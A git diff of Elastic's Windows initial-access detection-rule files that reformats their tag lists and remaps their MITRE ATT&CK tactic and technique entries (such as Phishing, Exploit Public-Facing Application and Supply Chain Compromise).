+updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -63,7 +63,14 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -104,18 +111,41 @@ sequence by user.id with maxspan=2m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique.subtechnique]] id = "T1027.006" name = "HTML Smuggling" reference = "https://attack.mitre.org/techniques/T1027/006/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/initial_access_execution_from_inetcache.toml b/rules/windows/initial_access_execution_from_inetcache.toml index 2d001fa4a96..1c10e770968 100644 --- a/rules/windows/initial_access_execution_from_inetcache.toml +++ b/rules/windows/initial_access_execution_from_inetcache.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -66,7 +66,21 @@ references = [ risk_score = 73 rule_id = "dca6b4b0-ae70-44eb-bb7a-ce6db502ee78" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -99,31 +113,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1189" -name = "Drive-by Compromise" -reference = "https://attack.mitre.org/techniques/T1189/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/windows/initial_access_execution_from_removable_media.toml b/rules/windows/initial_access_execution_from_removable_media.toml index 202f92da7e0..839778a74ba 100644 --- a/rules/windows/initial_access_execution_from_removable_media.toml +++ b/rules/windows/initial_access_execution_from_removable_media.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -19,7 +19,14 @@ name = "Execution from a Removable Media with Network Connection" risk_score = 21 rule_id = "1542fa53-955e-4330-8e4d-b2d812adeb5f" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -73,26 +80,14 @@ Removable media, like USB drives, are often used for data transfer but can be ex [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1091" name = "Replication Through Removable Media" reference = "https://attack.mitre.org/techniques/T1091/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1091" -name = "Replication Through Removable Media" -reference = "https://attack.mitre.org/techniques/T1091/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/initial_access_execution_remote_via_msiexec.toml b/rules/windows/initial_access_execution_remote_via_msiexec.toml index 63ecc9b7169..313b2343f65 100644 --- a/rules/windows/initial_access_execution_remote_via_msiexec.toml +++ b/rules/windows/initial_access_execution_remote_via_msiexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -18,7 +18,15 @@ name = "Potential Remote File Execution via MSIEXEC" risk_score = 21 rule_id = "3e441bdb-596c-44fd-8628-2cfdf4516ada" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -93,18 +101,36 @@ MSIEXEC, the Windows Installer, facilitates software installation, modification, [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/initial_access_execution_via_office_addins.toml b/rules/windows/initial_access_execution_via_office_addins.toml index 4ee5330946f..ce76d88f67f 100644 --- a/rules/windows/initial_access_execution_via_office_addins.toml +++ b/rules/windows/initial_access_execution_via_office_addins.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -63,7 +63,19 @@ references = [ risk_score = 47 rule_id = "ae8a142c-6a1d-4918-bea7-0b617e99ecfa" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -113,36 +125,36 @@ process where [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" - [[rule.threat.technique.subtechnique]] id = "T1137.006" name = "Add-ins" reference = "https://attack.mitre.org/techniques/T1137/006/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml b/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml index 90fbf00b319..c85bc4e1719 100644 --- a/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml +++ b/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/16" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -84,6 +84,36 @@ event.category:"registry" and host.os.type:"windows" and registry.value:"Friendl ''' +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1091" +name = "Replication Through Removable Media" +reference = "https://attack.mitre.org/techniques/T1091/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1052" +name = "Exfiltration Over Physical Medium" +reference = "https://attack.mitre.org/techniques/T1052/" +[[rule.threat.technique.subtechnique]] +id = "T1052.001" +name = "Exfiltration over USB" +reference = "https://attack.mitre.org/techniques/T1052/001/" + + + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [rule.new_terms] field = "new_terms_fields" value = ["registry.path"] diff --git a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml index 51e89480805..61e732cb424 100644 --- a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml +++ b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -71,7 +71,20 @@ references = [ risk_score = 47 rule_id = "730ed57d-ae0f-444f-af50-78708b57edd5" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Tactic: Execution", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -97,58 +110,22 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" - [[rule.threat.technique]] -id = "T1033" -name = "System Owner/User Discovery" -reference = "https://attack.mitre.org/techniques/T1033/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" -[[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -159,7 +136,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml index f9db67a7a6b..018003de5eb 100644 --- a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml +++ b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ references = [ risk_score = 73 rule_id = "a4f7a295-aba1-4382-9c00-f7b02097acbc" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -84,46 +92,14 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_rdp_file_mail_attachment.toml b/rules/windows/initial_access_rdp_file_mail_attachment.toml index f34cb7ca06e..f7ff84102c4 100644 --- a/rules/windows/initial_access_rdp_file_mail_attachment.toml +++ b/rules/windows/initial_access_rdp_file_mail_attachment.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -68,7 +68,21 @@ references = [ risk_score = 47 rule_id = "f401a0e3-5eeb-4591-969a-f435488e7d12" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Command and Control", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -86,18 +100,19 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml index cfc016b1525..7ec8d133027 100644 --- a/rules/windows/initial_access_script_executing_powershell.toml +++ b/rules/windows/initial_access_script_executing_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -76,7 +76,19 @@ references = ["https://www.elastic.co/security-labs/operation-bleeding-bear"] risk_score = 21 rule_id = "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" @@ -93,18 +105,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml index b11dbd1bfda..6846a4ea7e0 100644 --- a/rules/windows/initial_access_scripts_process_started_via_wmi.toml +++ b/rules/windows/initial_access_scripts_process_started_via_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/27" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -58,7 +58,17 @@ Windows Management Instrumentation (WMI) is a powerful Windows feature that allo risk_score = 47 rule_id = "b64b183e-1a76-422d-9179-7b389513e74d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -96,7 +106,23 @@ sequence by host.id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -106,8 +132,15 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml index 2171b83fa7e..402f26c77f3 100644 --- a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml +++ b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/13" [rule] author = ["Elastic"] @@ -49,7 +49,15 @@ references = [ risk_score = 47 rule_id = "c3d4e5f6-a7b8-6c9d-0e1f-2a3b4c5d6e7f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -76,49 +84,34 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" [[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" [[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" diff --git a/rules/windows/initial_access_suspicious_ms_exchange_files.toml b/rules/windows/initial_access_suspicious_ms_exchange_files.toml index 9ac8018570c..519fd905a68 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_files.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_files.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic", "Austin Songer"] @@ -48,7 +48,20 @@ references = [ risk_score = 47 rule_id = "6cd1779c-560f-4b68-a8f1-11009b27fe63" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -72,31 +85,26 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" +id = "T1210" +name = "Exploitation of Remote Services" +reference = "https://attack.mitre.org/techniques/T1210/" -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/initial_access_suspicious_ms_exchange_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_process.toml index a19fcd489c2..00f178cfbd2 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [rule] author = ["Elastic", "Austin Songer"] @@ -73,7 +73,22 @@ references = [ risk_score = 47 rule_id = "483c4daf-b0c6-49e0-adf3-0bfa93231d6b" severity = "medium" -tags = ["Domain: Endpoint", "OS: 